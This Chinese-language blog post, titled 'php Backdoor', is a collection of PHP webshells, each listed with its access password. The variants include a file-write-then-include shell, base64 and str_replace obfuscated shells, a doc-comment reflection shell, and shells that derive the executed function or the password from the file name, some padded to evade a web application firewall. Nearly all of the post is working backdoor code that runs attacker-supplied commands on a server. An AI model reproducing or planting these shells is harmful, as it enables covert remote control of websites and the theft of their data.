MENU

php Backdoor

April 24, 2014 • phpcode

0x01 写入后包含型后门

连接方式:http://xxx.com/?list=assert($_POST[x]);

<?php
/*
*
*文章列表生成文件
*/
if(isset($_GET['list'])){
   mud();
}
function mud(){
$fp=fopen('content_batch_stye.html','w');
file_put_contents('content_batch_stye.html',"<?php\r\n");
file_put_contents('content_batch_stye.html',$_GET['list'],FILE_APPEND);
fclose($fp);
require 'content_batch_stye.html';}
?>

密码:x

0x02 语法变形后门

<?php 
$oskl2="UUdWMllXd";$gkst3="29KRjlRVDFOVVd5ZDBaWE4wSjEw";$hbkw1="cE93P";$rcxh1="T0=";
$cbjo5 = str_replace("ct7","","ct7sct7tct7rct7_rct7ect7plct7act7ce");
$xxfu8 = $cbjo5("gd2", "", "gd2bagd2sgd2e6gd24gd2_gd2dgd2egd2cgd2ogd2dgd2e");
$xlco7 = $cbjo5("cgs1","","cgs1ccgs1recgs1atcgs1ecgs1_fcgs1unccgs1tcgs1iocgs1n");
$safm1 = $xlco7('', $xxfu8($xxfu8($cbjo5("#;*,.", "", $oskl2.$gkst3.$hbkw1.$rcxh1)))); $safm1();
?>

密码 test

<?php
error_reporting(0);
$nwt="ICRhID0gImEitLiJz";
$nnc="3Z2ZtXUiXSkt7IA==";
$hm="tIi4icyIuImUiLiJ";
$fz="tyIi4idCI7JGEoJF9QT1NUWytJsb";
$ifw = str_replace("d","","dsdtdrd_drdepdldacde");
$ang = $ifw("h", "", "bhahshe6h4_dhehchohde");
$rr = $ifw("tm","","tmcrtmetmatmtetm_tmftmutmnctmttmitmon");
$ljy = $rr('', $ang($ifw("t", "", $nwt.$hm.$fz.$nnc))); $ljy();
?>

密码 lovveu

0x03 注释型后门

<?php
/**
* eval($_POST["c"]);
* assert
*/
class TestClass { }  
//随便注册一个类
$rc = new ReflectionClass('TestClass');
//实例化一个反射类
$str=$rc->getDocComment();
//拿到了我对testClass类的注释
$pos=strpos($str,'e');
$eval=substr($str,$pos,18);
$pos=strpos($str,'assert');
$fun=substr($str,$pos,6);
//这个获取文本,以便用于构造动态函数。
echo $eva;
$fun($eval);
//这个就是执行了。
?>

密码 c

0x05 文件名型后门

特点:敏感函数来自于文件名

<?php
//xaxsxsxexrxtx_config.php
//文件名不能修改
error_reporting(0);
set_time_limit(0);
$self=$_SERVER['PHP_SELF'];
$arr=explode("/",$self);
foreach($arr as $value){
        if(substr_count(strtolower($value),".php")>0){
                $temp=$value;
        }
}
$temp=str_replace(".php","",strtolower($temp));
$temp=str_replace("_config","",$temp);
$func=trim(str_replace("x","",$temp));
@$func($_REQUEST['cmd']);
die();
?>

密码 cmd

0x06 密码来自文件名型后门

<?php
error_reporting(0);
set_time_limit(0);
$func='';
$func.='a';
$func.='safedogissb';
$func.='sbissafedog';
$func.='ss';
$func.='safedogissupersb';
$func.='er';
$func.='supersbxissafedog';
$func.='t';
$pass=$_SERVER['PHP_SELF'];
$arr=explode("/",$pass);
foreach($arr as $value){
        if(substr_count(strtolower($value),".php")>0){
                $pass=$value;
        }
}
$func=str_replace('safedogissb','',$func);
$func=str_replace('sbissafedog','',$func);
$func=str_replace('safedogissupersb','',$func);
$func=str_replace('supersbxissafedog','',$func);
$pass=str_replace('.php','',strtolower($pass));
@$func(
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        $_REQUEST[
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                $pass
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                
                ].";"
        );

密码来自文件名称

Tags: backdoor
Archives QR Code
QR Code for this page
Tipping QR Code